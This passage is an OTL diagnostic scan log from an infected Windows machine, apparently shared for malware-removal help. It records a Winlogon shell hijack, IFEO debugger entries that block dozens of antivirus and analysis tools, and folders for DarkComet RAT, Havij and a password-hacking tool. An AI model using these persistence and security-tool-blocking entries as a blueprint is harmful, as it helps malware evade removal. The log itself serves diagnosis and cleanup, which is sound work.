O20 - HKCU Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)

O20 - HKCU Winlogon: Shell - ("C:\Windows\SysWOW64\Windows Server\wserver.exe") - C:\Windows\SysWOW64\Windows Server\wserver.exe ()

O20:64bit: - Winlogon\Notify\avldr: DllName - (avldr64.dll) - File not found

O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)

O24 - Desktop BackupWallPaper: C:\Windows\Web\Wallpaper\awisp.jpg

O27:64bit: - HKLM IFEO\ASD2.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\ASD2Srv.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\AvastSvc.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\AvastUI.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\avcenter.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\avconfig.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\avgnt.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\avguard.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\avp.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\avscan.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\bdagent.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\blindman.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\ccuac.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\ComboFix.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\egui.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\hijackthis.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\instup.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\keyscrambler.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\mbam.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\mbamgui.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\mbampt.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\mbamscheduler.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\mbamservice.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\MpCmdRun.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\MSASCui.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\MsMpEng.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\msseces.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\rstrui.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\SDFiles.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\SDMain.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\SDWinSec.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\spybotsd.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\SUPERAntiSpyware.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\wireshark.exe: Debugger - nqij.exe File not found

O27:64bit: - HKLM IFEO\zlclient.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\ASD2.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\ASD2Srv.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\AvastSvc.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\AvastUI.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\avcenter.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\avconfig.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\avgnt.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\avguard.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\avp.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\avscan.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\bdagent.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\blindman.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\ccuac.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\ComboFix.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\egui.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\hijackthis.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\instup.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\keyscrambler.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\mbam.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\mbamgui.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\mbampt.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\mbamscheduler.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\mbamservice.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\MpCmdRun.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\MSASCui.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\MsMpEng.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\msseces.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\rstrui.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\SDFiles.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\SDMain.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\SDWinSec.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\spybotsd.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\SUPERAntiSpyware.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\wireshark.exe: Debugger - nqij.exe File not found

O27 - HKLM IFEO\zlclient.exe: Debugger - nqij.exe File not found

O28:64bit: - HKLM ShellExecuteHooks: {AEB6717E-7E19-11d0-97EE-00C04FD91972} - No CLSID value found.

O32 - HKLM CDRom: AutoRun - 1

O32 - AutoRun File - [2014/04/27 16:07:22 | 000,000,000 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]

O34 - HKLM BootExecute: (autocheck autochk *)

O34 - HKLM BootExecute: (MACHINE BootExecut)

O35:64bit: - HKLM\..comfile [open] -- "%1" %*

O35:64bit: - HKLM\..exefile [open] -- "%1" %*

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*

O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*

O37 - HKLM\...com [@ = comfile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

Drivers32:64bit: msacm.bdmpeg - bdmpega64.acm ()

Drivers32:[b]64bit: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)

Drivers32:[b]64bit: VIDC.CSCD - camcodec.dll (CamStudio Group)

Drivers32:[b]64bit: vidc.mjpg - bdmjpeg64.dll ()

Drivers32:[b]64bit: vidc.mpeg - bdmpegv64.dll ()

Drivers32:[b]64bit: vidc.tscc - C:\Windows\SysWOW64\tsccvid64.dll (TechSmith Corporation)

Drivers32:[b]64bit: VIDC.XFR1 - xfcodec64.dll ()

Drivers32:[b]64bit: vidc.XVID - xvidvfw.dll ()

Drivers32: msacm.bdmpeg - C:\Windows\SysWow64\bdmpega.acm ()

Drivers32: msacm.l3acm - C:\Windows\SysWow64\l3codecp.acm (Fraunhofer Institut Integrierte Schaltungen IIS)

Drivers32: msacm.l3codecp - C:\Windows\SysWow64\l3codecp.acm (Fraunhofer Institut Integrierte Schaltungen IIS)

Drivers32: vidc.cvid - C:\Windows\SysWow64\iccvid.dll (Radius Inc.)

Drivers32: vidc.DIVX - C:\Windows\SysWow64\DivX.dll (DivX, Inc.)

Drivers32: vidc.iv50 - C:\Windows\SysWow64\ir50_32.dll (Intel Corporation)

Drivers32: vidc.mjpg - C:\Windows\SysWow64\bdmjpeg.dll ()

Drivers32: vidc.mpeg - C:\Windows\SysWow64\bdmpegv.dll ()

Drivers32: vidc.tscc - C:\Windows\SysWOW64\tsccvid.dll (TechSmith Corporation)

Drivers32: VIDC.XFR1 - C:\Windows\SysWow64\xfcodec.dll ()

Drivers32: vidc.XVID - C:\Windows\SysWow64\xvidvfw.dll ()

Drivers32: vidc.yv12 - C:\Windows\SysWow64\DivX.dll (DivX, Inc.)

CREATERESTOREPOINT

Unable to start System Restore Service. Error code 1084

========== Files/Folders - Created Within 30 Days ==========

[2014/05/30 11:08:43 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Owner\Desktop\OTL.exe

[2014/05/30 08:25:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro

[2014/05/30 08:25:28 | 000,000,000 | ---D | C] -- C:\Program Files\HitmanPro

[2014/05/30 08:24:31 | 000,000,000 | ---D | C] -- C:\ProgramData\HitmanPro

[2014/05/30 08:21:29 | 000,000,000 | ---D | C] -- C:\VIPRERESCUE

[2014/05/28 08:43:24 | 000,000,000 | -HSD | C] -- C:\Users\Owner\Documents\WindSys

[2014/05/26 13:17:17 | 000,000,000 | ---D | C] -- C:\SMCLPAV

[2014/05/26 13:16:17 | 000,446,464 | ---- | C] (eHelp Corporation.) -- C:\Windows\SysWow64\HHActiveX.dll

[2014/05/26 13:15:21 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Panda Security

[2014/05/26 13:15:21 | 000,000,000 | ---D | C] -- C:\ProgramData\Panda Security

[2014/05/26 13:15:21 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Panda Security

[2014/05/26 13:12:20 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center

[2014/05/26 13:12:15 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\360

[2014/05/26 11:07:24 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\SearchProtect

[2014/05/26 10:42:08 | 000,000,000 | ---D | C] -- C:\Users\Owner\Desktop\rkill

[2014/05/26 09:47:02 | 000,000,000 | ---D | C] -- C:\NVIDIA

[2014/05/26 09:38:08 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Ubisoft

[2014/05/26 08:38:13 | 000,000,000 | ---D | C] -- C:\5b752946a35719a003b287da

[2014/05/26 05:54:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Comodo

[2014/05/26 04:39:52 | 000,000,000 | ---D | C] -- C:\ProgramData\YoutubeAdblocker

[2014/05/26 03:20:57 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\SpeedyPC Software

[2014/05/26 03:20:57 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\DriverCure

[2014/05/26 03:20:49 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedyPC Software

[2014/05/26 03:20:48 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\SpeedyPC Software

[2014/05/26 03:20:39 | 000,000,000 | ---D | C] -- C:\ProgramData\SpeedyPC Software

[2014/05/26 03:20:39 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SpeedyPC Software

[2014/05/26 01:39:19 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\KSafe

[2014/05/26 01:39:19 | 000,000,000 | ---D | C] -- C:\ProgramData\KSafe

[2014/05/26 01:39:14 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DllTool

[2014/05/26 01:39:11 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\DllTool

[2014/05/26 01:10:43 | 000,000,000 | ---D | C] -- C:\malware

[2014/05/26 01:09:35 | 000,000,000 | ---D | C] -- C:\Users\Owner\Documents\Malware

[2014/05/26 00:25:28 | 000,000,000 | -HSD | C] -- C:\ProgramData\{01BD4FC9-2F86-4706-A62E-774BB7E9D308}

[2014/05/25 23:48:17 | 000,000,000 | ---D | C] -- C:\_OTM

[2014/05/25 22:05:48 | 000,000,000 | ---D | C] -- C:\SUPERDelete

[2014/05/25 21:25:01 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\SUPERAntiSpyware.com

[2014/05/25 21:25:01 | 000,000,000 | ---D | C] -- C:\ProgramData\SUPERAntiSpyware.com

[2014/05/25 20:30:40 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Hamachi

[2014/05/25 20:30:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\LogMeIn Hamachi

[2014/05/25 20:28:05 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\dclogs

[2014/05/25 20:21:47 | 000,000,000 | -HSD | C] -- C:\ProgramData\Windows Server

[2014/05/25 19:55:13 | 000,000,000 | -HSD | C] -- C:\Windows\SysWow64\Windows Server

[2014/05/25 19:25:54 | 000,000,000 | ---D | C] -- C:\ProgramData\SNT

[2014/05/25 19:25:53 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SNT

[2014/05/25 19:24:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SearchProtect

[2014/05/25 19:24:24 | 000,000,000 | ---D | C] -- C:\ProgramData\TopApp software

[2014/05/25 19:22:37 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\YoutubeAdblocker

[2014/05/25 19:22:33 | 000,000,000 | ---D | C] -- C:\ProgramData\sAve on

[2014/05/25 19:22:33 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Packages

[2014/05/25 19:22:32 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\sAve on

[2014/05/25 19:22:30 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Torch

[2014/05/25 19:22:30 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Chromatic Browser

[2014/05/25 19:22:30 | 000,000,000 | ---D | C] -- C:\ProgramData\5ad6ba851b005ffc

[2014/05/25 19:22:29 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Comodo

[2014/05/25 19:20:32 | 000,000,000 | ---D | C] -- C:\ProgramData\InstallMate

[2014/05/25 18:21:17 | 000,188,928 | -H-- | C] (ghaMJsw) -- C:\Users\Owner\AppData\Roaming\File Name.exe

[2014/05/25 17:13:15 | 000,000,000 | ---D | C] -- C:\Users\Owner\AlwaysOnPC

[2014/05/25 16:29:11 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Neptune

[2014/05/25 15:41:25 | 000,000,000 | ---D | C] -- C:\Users\Owner\Documents\AutomaticSolution Software

[2014/05/25 15:41:23 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\EasyAutoClicker

[2014/05/25 15:41:23 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Easy Auto Clicker

[2014/05/25 13:39:20 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\AminApps

[2014/05/25 13:39:20 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\A&N File Recovery

[2014/05/25 13:39:20 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\A&N File Recovery

[2014/05/21 22:10:14 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Twitter Password Hacking Tool v2.5.7

[2014/05/21 17:46:15 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype

[2014/05/18 18:44:38 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DarkComet RAT Legacy

[2014/05/18 18:44:34 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\PhrozenSoft

[2014/05/14 03:34:04 | 017,938,608 | ---- | C] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerInstaller.exe

[2014/05/14 03:18:43 | 000,084,992 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll

[2014/05/14 03:18:43 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll

[2014/05/14 03:18:22 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\DESIGNER

[2014/05/13 17:00:41 | 000,477,184 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll

[2014/05/13 17:00:41 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll

[2014/05/13 16:59:00 | 001,460,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\lsasrv.dll

[2014/05/13 16:58:59 | 003,969,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe

[2014/05/13 16:58:59 | 003,914,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe

[2014/05/13 16:58:58 | 005,550,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe

[2014/05/13 16:58:58 | 000,722,944 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\objsel.dll

[2014/05/13 16:58:58 | 000,455,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winlogon.exe

[2014/05/13 16:58:57 | 000,538,112 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\objsel.dll

[2014/05/13 16:58:57 | 000,424,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\KernelBase.dll

[2014/05/13 16:58:56 | 000,136,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspicli.dll

[2014/05/13 16:58:56 | 000,057,344 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cngprovider.dll

[2014/05/13 16:58:56 | 000,056,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\adprovider.dll

[2014/05/13 16:58:56 | 000,053,760 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\capiprovider.dll

[2014/05/13 16:58:56 | 000,052,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dpapiprovider.dll

[2014/05/13 16:58:56 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\cngprovider.dll

[2014/05/13 16:58:56 | 000,049,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\adprovider.dll

[2014/05/13 16:58:56 | 000,048,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\capiprovider.dll

[2014/05/13 16:58:56 | 000,047,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dpapiprovider.dll

[2014/05/13 16:58:56 | 000,044,544 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dimsroam.dll

[2014/05/13 16:58:56 | 000,039,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wincredprovider.dll

[2014/05/13 16:58:56 | 000,036,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dimsroam.dll

[2014/05/13 16:58:56 | 000,035,328 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wincredprovider.dll

[2014/05/13 16:58:56 | 000,029,184 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspisrv.dll

[2014/05/13 16:58:56 | 000,028,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\secur32.dll

[2014/05/07 03:01:27 | 000,000,000 | --SD | C] -- C:\Windows\SysNative\CompatTel

[2014/05/04 11:45:23 | 000,260,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\RICHTX32.ocx

[2014/05/04 11:45:23 | 000,209,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\tabctl32.ocx

[2014/05/04 11:45:23 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Havij

[2014/05/04 11:45:22 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Havij

[2014/05/04 00:12:36 | 000,000,000 | ---D | C] -- C:\Users\Owner\Documents\Paint.NET User Files

[2014/05/03 14:36:58 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Maintenance Service

[2014/05/01 20:52:46 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

[2014/05/01 20:52:38 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome

[2014/05/01 20:20:54 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\MultiBit

[2014/05/01 20:20:31 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\MultiBit-0.5.18

[2014/05/01 20:20:31 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MultiBit

[3 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2014/05/30 23:07:14 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Owner\Desktop\OTL.exe

[2014/05/30 11:11:13 | 000,723,544 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\msconfig.ini

[2014/05/30 10:51:16 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat

[2014/05/30 10:47:49 | 000,045,581 | ---- | M] () -- C:\Users\Owner\Documents\mwb-error-2.png

[2014/05/30 10:46:12 | 000,040,689 | ---- | M] () -- C:\Users\Owner\Documents\mwb-error.png

[2014/05/30 10:40:01 | 000,019,344 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

[2014/05/30 10:40:00 | 000,019,344 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

[2014/05/30 10:31:45 | 000,032,512 | ---- | M] () -- C:\Windows\SysNative\drivers\hitmanpro37.sys

[2014/05/30 08:57:24 | 000,001,130 | ---- | M] () -- C:\Users\Owner\Desktop\ROBLOX Studio 2013.lnk

[2014/05/30 08:25:29 | 000,001,889 | ---- | M] () -- C:\Users\Public\Desktop\HitmanPro.lnk

[2014/05/28 10:25:52 | 000,002,235 | ---- | M] () -- C:\Windows\epplauncher.mif

[2014/05/26 13:12:20 | 000,001,049 | ---- | M] () -- C:\Users\Owner\Desktop\360 Total Security.lnk

[2014/05/26 10:41:58 | 000,000,468 | -H-- | M] () -- C:\Windows\tasks\SO.Booster-S-603818780.job

[2014/05/26 10:37:09 | 000,000,908 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1000UA.job

[2014/05/26 10:34:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job

[2014/05/26 10:27:00 | 000,000,388 | ---- | M] () -- C:\Windows\tasks\update-S-1-5-21-133263452-1906430011-745098151-1000.job

[2014/05/26 10:22:00 | 000,000,388 | ---- | M] () -- C:\Windows\tasks\update-sys.job

[2014/05/26 10:17:00 | 000,000,924 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1005UA.job

[2014/05/26 10:06:04 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[2014/05/26 10:05:00 | 000,000,384 | ---- | M] () -- C:\Windows\tasks\WpsUpdateTask_Nick.job

[2014/05/26 09:38:21 | 000,281,872 | ---- | M] () -- C:\Windows\SysWow64\PnkBstrB.exe

[2014/05/26 09:38:14 | 000,281,872 | ---- | M] () -- C:\Windows\SysWow64\PnkBstrB.ex0

[2014/05/26 09:38:13 | 000,076,888 | ---- | M] () -- C:\Windows\SysWow64\PnkBstrA.exe

[2014/05/26 09:15:01 | 000,000,928 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1000UA.job

[2014/05/26 05:36:34 | 002,993,976 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT

[2014/05/26 03:21:01 | 000,000,444 | ---- | M] () -- C:\Windows\tasks\SpeedyPC Registration3.job

[2014/05/26 03:20:49 | 000,001,197 | ---- | M] () -- C:\Users\Owner\Desktop\SpeedyPC Pro.lnk

[2014/05/26 03:20:49 | 000,000,571 | ---- | M] () -- C:\Windows\tasks\SpeedyPC Pro_sch_A41C6437-E4AE-11E3-9423-0026188D9465.job

[2014/05/26 03:20:49 | 000,000,464 | ---- | M] () -- C:\Windows\tasks\SpeedyPC Update Version3_triggeronce.job

[2014/05/26 03:20:49 | 000,000,464 | ---- | M] () -- C:\Windows\tasks\SpeedyPC Update Version3.job

[2014/05/26 01:39:14 | 000,001,077 | ---- | M] () -- C:\Users\Owner\Desktop\DllTool.lnk

[2014/05/26 00:31:51 | 000,000,510 | ---- | M] () -- C:\Windows\tasks\SUPERAntiSpyware Scheduled Task e1800e5a-718e-492b-81f8-0f6a2e27702e.job

[2014/05/26 00:31:51 | 000,000,510 | ---- | M] () -- C:\Windows\tasks\SUPERAntiSpyware Scheduled Task 21055d1e-66ba-4203-943b-3df24c22fd8c.job

[2014/05/26 00:07:25 | 000,000,890 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job

[2014/05/25 22:17:00 | 000,000,902 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1005Core.job

[2014/05/25 21:15:00 | 000,000,906 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1000Core.job

[2014/05/25 20:30:41 | 000,000,841 | ---- | M] () -- C:\Users\Public\Desktop\LogMeIn Hamachi.lnk

[2014/05/25 19:23:08 | 004,210,176 | ---- | M] () -- C:\Program Files (x86)\SO_x64.Booster

[2014/05/25 19:23:08 | 000,174,928 | ---- | M] () -- C:\Program Files (x86)\SOSvc.dll

[2014/05/25 19:23:07 | 004,296,192 | ---- | M] () -- C:\Program Files (x86)\SO.Booster

[2014/05/25 19:18:52 | 000,043,850 | -H-- | M] () -- C:\Users\Owner\AppData\Roaming\Ownerlog.dat

[2014/05/25 18:36:00 | 000,000,856 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1000Core.job

[2014/05/25 18:21:16 | 000,188,928 | -H-- | M] (ghaMJsw) -- C:\Users\Owner\AppData\Roaming\File Name.exe

[2014/05/25 15:41:24 | 000,001,123 | ---- | M] () -- C:\Users\Public\Desktop\Easy Auto Clicker.lnk

[2014/05/24 18:03:43 | 000,119,512 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys

[2014/05/22 16:28:13 | 000,426,834 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\Bypasss.exe

[2014/05/20 18:20:04 | 000,002,098 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk

[2014/05/20 16:15:03 | 000,000,334 | ---- | M] () -- C:\Windows\tasks\HPCeeScheduleForOwner.job

[2014/05/15 22:35:11 | 000,000,050 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\install.imp

[2014/05/14 08:03:47 | 000,000,632 | RHS- | M] () -- C:\Users\Owner\ntuser.pol

[2014/05/14 03:34:12 | 000,692,400 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe

[2014/05/14 03:34:12 | 000,070,832 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl

[2014/05/14 03:34:04 | 017,938,608 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerInstaller.exe

[2014/05/12 07:26:10 | 000,063,704 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mwac.sys

[2014/05/12 07:26:00 | 000,091,352 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys

[2014/05/12 07:25:56 | 000,025,816 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys

[2014/05/10 19:36:06 | 000,002,046 | -H-- | M] () -- C:\Users\Owner\Documents\Default.rdp

[2014/05/09 01:14:03 | 000,477,184 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll

[2014/05/09 01:11:23 | 000,424,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll

[2014/05/05 22:00:47 | 000,084,992 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll

[2014/05/05 21:10:52 | 000,069,632 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll

[2014/05/03 14:37:00 | 000,001,143 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk

[2014/05/01 20:52:38 | 000,002,295 | ---- | M] () -- C:\Users\Owner\Desktop\Chrome App Launcher.lnk

[2014/05/01 20:20:31 | 000,001,813 | ---- | M] () -- C:\Users\Owner\Desktop\MultiBit 0.5.18.lnk

[3 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

